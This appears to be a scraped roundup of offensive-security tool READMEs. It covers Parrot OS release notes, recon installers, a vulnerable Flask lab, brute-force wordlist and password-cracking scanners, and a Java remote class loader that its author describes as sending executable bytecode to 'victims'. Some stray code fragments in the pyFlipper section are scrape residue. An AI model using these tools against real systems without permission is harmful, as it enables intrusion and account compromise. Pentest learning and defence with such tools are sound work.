Even if we recommend to always update your version, it is also recommended to do a backup and re-install the latest version to have a cleaner and more reliable user experience, especially if you upgrade from a very old version of parrot.

What's new in Parrot OS 5.1

New kernel 5.18.

You can find all the infos about the new Kernel 5.18 by clickig on this link.

Updated docker containers

Our docker offering has been revamped! We now provide our dedicated parrot.run image registry along with the default docker.io one.

All our images are now natively multiarch, and support amd64 and arm64 architectures.

Our containers offering was updated as well, and we are committed to further improve it.

Run docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.

Updated backports.

Several packages were updated and backported, like the new Golang 1.19 or Libreoffice 7.4. This is part of our commitment to provide the latest version of every most important software while choosing a stable LTS release model.

To make sure to have all the latest packages installed from our backports channel, use the following commands:

  • sudo apt update
  • sudo apt full-upgrade -t parrot-backports

System updates

The system has received important updates to some opf its key packages, like parrot-menu, which now provides additional launchers to our newly imported tools; or parrot-core, which now provides a new firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.

Firefox profile overhault

As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.

Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.

We have also boosted our effort to avoid Mozilla telemetry and bring DuckDuckGo back as the default search engine, while we are exploring other alternatives for the future.

Tools updates

Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.

Important updates involved metasploit, exploitdb and other popular tools as well.

New AnonSurf 4.0

The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.

Anonsurf is our in-house anonymity solution that routes all the system traffic through TOR automatically without having to set up proxy settings for each individua program, and preventing traffic leaking in most cases.

The new version provides significant fixes and reliability updates, fully supports debian systems without the old resolvconf setup, has a new user interface with improved system tray icon and settings dialog window, and offers a better overall user experience.

Parrot IoT improvements

Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.

The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.

Architect Edition improvements

Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.

The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.

You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.

New infrastructure powered by Parrot and Kubernetes

The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.

This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.



Arsenal - Recon Tool installer



Arsenal is a Simple shell script (Bash) used to install the most important tools and requirements for your environment and save time in installing all these tools.


Tools in Arsenal

Name description
Amass The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques
ffuf A fast web fuzzer written in Go
dnsX Fast and multi-purpose DNS toolkit allow to run multiple DNS queries
meg meg is a tool for fetching lots of URLs but still being 'nice' to servers
gf A wrapper around grep to avoid typing common patterns
XnLinkFinder This is a tool used to discover endpoints crawling a target
httpX httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads
Gobuster Gobuster is a tool used to brute-force (DNS,Open Amazon S3 buckets,Web Content)
Nuclei Nuclei tool is Golang Language-based tool used to send requests across multiple targets based on nuclei templates leading to zero false positive or irrelevant results and provides fast scanning on various host
Subfinder Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well
Naabu Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply
assetfinder Find domains and subdomains potentially related to a given domain
httprobe Take a list of domains and probe for working http and https servers
knockpy Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack
waybackurl fetch known URLs from the Wayback Machine for *.domain and output them on stdout
Logsensor A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Subzy Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Xss-strike Advanced XSS Detection Suite
Altdns Subdomain discovery through alterations and permutations
Nosqlmap NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database
ParamSpider Parameter miner for humans
GoSpider GoSpider - Fast web spider written in Go
eyewitness EyeWitness is a Python tool written by @CptJesus and @christruncer. It’s goal is to help you efficiently assess what assets of your target to look into first.
CRLFuzz A fast tool to scan CRLF vulnerability written in Go
DontGO403 dontgo403 is a tool to bypass 40X errors
Chameleon Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies
uncover uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools
wpscan WordPress Security Scanner

Requirements in Arsenal

  • Python3
  • Git
  • Ruby
  • Wget
  • GO-Lang
  • Rust:fast:

Go-lang installation

 sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
nano /etc/profile or .profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile #to update you shell dont worry

How to install

git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh




Erlik 2 - Vulnerable-Flask-App


Erlik 2 - Vulnerable-Flask-App

Tested - Kali 2022.1

Description

It is a vulnerable Flask Web App. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • HTML Injection
  • XSS
  • SSTI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization
  • Broken Authentication
  • DOS
  • File Upload

Installation

git clone https://github.com/anil-yelken/Vulnerable-Flask-App

cd Vulnerable-Flask-App

sudo pip3 install -r requirements.txt

Usage

python3 vulnerable-flask-app.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Utkuici - Nessus Automation


Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyzes are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, exploitable vulnerabilities can be determined, and a python application that can work integrated with Tenable Nessus has been developed to automatically identify these processes.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation cd Nessus-Automation sudo pip3 install requirements.txt

Usage

The SIEM IP address in the codes should be changed.

In order to detect a new IP address exactly, it was checked whether the phrase "Host Discovery" was used in the Nessus scan name, and the live IP addresses were recorded in the database with a timestamp, and the difference IP address was sent to SIEM. The contents of the hosts table were as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, the port-IP-time stamp information is recorded in the database, it detects a newly opened service over the database and transmits the data to SIEM in the form of "New Port:" port-IP-time stamp. The result observed by SIEM is as follows:

Usage: python finding-new-port-nessus.py

In the findings of vulnerability scans made in institutions and organizations, primarily exploitable vulnerabilities should be closed. At the same time, it records the vulnerabilities in the database that can be exploited with metasploit in the institutions and transmits this information to SIEM when it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API


This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The client receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled before starting the server.


Features

  • Client-server architecture
  • Remote loading of Java class files
  • In-transit encryption using ChaCha20 cipher
  • Settings defined via args
  • Keepalive mechanism to re-establish communication if server restarts

Installation

Tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.

https://www.openlogic.com/openjdk-downloads

Usage

$ java -jar java-class-loader.jar -help

usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server

Example

Assuming you have the following Hello World payload in the Payload.java file:

//Payload.java
public class Payload {
public static String exec() {
String output = "";
try {
output = "Hello world from client!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}

Then you should compile and produce the respective Payload.class file.

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the -client flag and use the symmetric key generated by server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting class file from server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

References

Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related with the development of this tool.

  1. https://github.com/rebeyond/Behinder

  2. https://github.com/AntSwordProject/antSword

  3. https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/

  4. https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis

  5. https://xz.aliyun.com/t/2799

  6. https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7

  7. https://venishjoe.net/post/dynamically-load-compiled-java-class/

  8. https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php

  9. https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/

  10. https://openjdk.org/jeps/329

  11. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html

  12. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html



Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.


Usage

I cannot be held responsible for the malicious use of the vehicle.

ssidBul.py has been tested via TP-LINK TL WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Deadfinder - Find Dead-Links (Broken Links)


Dead link (broken link) means a link within a web page that cannot be connected. These links can have a negative impact to SEO and Security. This tool makes it easy to identify and modify.


Installation

Install with Gem

gem install deadfinder

Docker Image

docker pull ghcr.io/hahwul/deadfinder:latest

Usage

Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.

Options:
c, [--concurrency=N] # Set Concurrncy
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result

Modes

# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe

# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt

# Scan the Single URL.
deadfinder url https://www.hahwul.com

# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml

JSON Handling

deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json

cat output.json | jq


Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Has Leaked Previously To Prevent Targeted Password Reuse Attacks


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords has leaked previously to prevent targeted password reuse attacks.


Why develop another password manager ?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state of the art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation to make it harder for attacker to conduct brute force attacks.
    • Aes-gcm256 for database encryption.
  • Custom encrypted key-value database which ensures data integrity.(Read the blog post I wrote about it here.)
  • Easy to install and to use. Does not require connection to an external service for its core functionality.
  • Check if your passwords are leaked before to avoid targeted password reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 digits to XposedOrNot.

Installation

Pmanager depends on "pkg-config" and "libssl-dev" packages on ubuntu. Simply install them with

sudo apt install pkg-config libssl-dev -y

Download the binary file according to your current OS from releases, and add the binary location to PATH environment variable and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system. But you should be able to build it from the source ("cargo build --release"). since there are no OS specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexade cimal characters to xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



SpyCast - A Crossplatform mDNS Enumeration Tool


SpyCast is a crossplatform mDNS enumeration tool that can work either in active mode by recursively querying services, or in passive mode by only listening to multicast packets.


Building

cargo build --release

OS specific bundle packages (for example dmg and app bundles on OSX) can be built via:

cargo tauri build

SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:

cargo build --no-default-features --release

Running

Run SpyCast in active mode (it will recursively query all available mDNS services):

./target/release/spycast

Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):

./target/release/spycast --passive

Other options

Run spycast --help for the complete list of options.

License

This project is made with ♥ by @evilsocket and it is released under the GPL3 license.


Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns


psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.


Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:

 

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]

Individuals

When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining options --years and --append-numbering with a --numbering-limit ≥ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.



Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...


  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent。red team tools Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, do not repeat the wheel, unless there are bugs, problems
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
  • Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE- 2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results Using nmap additionally requires setting the root password to an environment variable

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG COUNT AUTHOR COUNT DIRECTORY COUNT SEVERITY COUNT TYPE COUNT
cve 1294 daffainfo 605 cves 1277 info 1352 http 3554
panel 591 dhiyaneshdk 503 exposed-panels 600 high 938 file 76
lfi 486 pikpikcu 321 vulnerabilities 493 medium 766 network 50
xss 439 pdteam 269 technologies 266 critical 436 dns 17
wordpress 401 geeknik 187 exposures 254 low 211
exposure 355 dwisiswant0 169 misconfiguration 207 unknown 7
cve2021 322 0x_akoko 154 token-spray 206
rce 313 princechaddha 147 workflows 187
wp-plugin 297 pussycat0x 128 default-logins 101
tech 282 gy741 126 file 76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *.xxx.com, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
    • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
      1. Intelligently handle http abnormal pages, and fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch for batch, touch typing
    • There will be time in the future to implement the golang version how to use?
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr 


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

    1. Start Elasticsearch, of course you can use the traditional way to output, results
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query
  • Please install nmap by yourself before use Using Help
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
  • Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
  • Integrate more fuzzers , such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • how use Cookie?
  • libpcap related question

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301 并发多实例的bug
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 添加dcom Protocol enumeration network interfaces
  • 2022-06-30 嵌入式集成私人版本nuclei-templates 共3744个YAML POC; 1、集成Elasticsearch存储中间结果 2、嵌入整个config目录到程序中
  • 2022-06-27 优化模糊匹配,提高正确率、鲁棒性;集成ksubdomain进度
  • 2022-06-24 优化指纹算法;增加工作流程图
  • 2022-06-23 添加参数ParseSSl,控制默认不深度分析SSL中的DNS信息,默认不对SSL中dns进行扫描;优化:nmap未自动加.exe的bug;优化windows下缓存文件未优化体积的bug
  • 2022-06-22 集成11种协议弱口令检测、密码爆破:ftp、mongodb、mssql、mysql、oracle、postgresql、rdp、redis、smb、ssh、telnet,同时优化支持外挂密码字典
  • 2022-06-20 集成Subfinder,域名爆破,启动参数导出EnableSubfinder=true,注意启动后很慢; ssl证书中域名信息的自动深度钻取 允许通过 config/config.json 配置定义自己的字典,或设置相关开关
  • 2022-06-17 优化一个域名多个IP的情况,所有IP都会被端口扫描,然后按照后续的扫描流程
  • 2022-06-15 此版本增加了过去实战中获得的几个weblogic密码字典和webshell字典
  • 2022-06-10 完成核的整合,当然包括核模板的整合
  • 2022-06-07 添加相似度算法来检测 404
  • 2022-06-07 增加http url列表精准扫描参数,根据环境变量UrlPrecise=true开启


pyFlipper - Unoffical Flipper Zero Cli Wrapper Written In Python


Unoffical Flipper Zero cli wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

bluetooth info bt_info = flipper.bt.info()">
#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable. The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc. """ flipper.storage.write.send(text_two) time.sleep(3) #Don't forget to stop flipper.storage.write.stop()">
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
